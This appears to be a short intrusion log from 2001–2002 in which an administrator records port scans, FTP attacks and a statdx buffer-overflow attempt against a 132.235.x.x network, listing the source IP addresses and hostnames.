21 2001/11/30-08:42:09 129.187.148.52 (kilauea.cis.uni-muenchen.de) scannet for port 22 2001/11/30-09:43:18.26 146.229.4.165 (University of Alabama) >700 bad connects to 132.235.19.44 ports 7,21,70,80,143,119,110,25,... 2001/11/30-11:14:03.39 205.251.201.203 (Cable Atlantic Inc.,CA) scannet for port 80 2001/11/30-15:03:27.67 217.136.2.55 (adsl-33335.turboline.skynet.be) scannet for port 21 2001/11/30-20:15:05.33 211.158.6.22 (CQBN YU GAO IDC,CN) scannet for port 111 2001/11/30-21:35:21.00 194.102.114.60 (GENERAL COMTRUST INC,PETROSANI,RO) scan 1 high number port per machine on net, slow scan all day 2001/11/30-21:56:24.48 212.239.173.132 (u212-239-173-132.adsl.pi.be) scannet for port 21+anon ftp attacks 2001/11/30-23:12:08.82 163.121.254.105 (subnet254.idsc.gov.eg) scannet for port 111 2001/11/30-23:12:10.08 163.121.254.105 (subnet254.idsc.gov.eg) start of buff overflow attacks(statdx) 2002/11/12-23:09:41.07 66.36.128.158 (dsl-128-158.aei.ca) attack & penatrate 132.235.16.8 - ftpd port 14232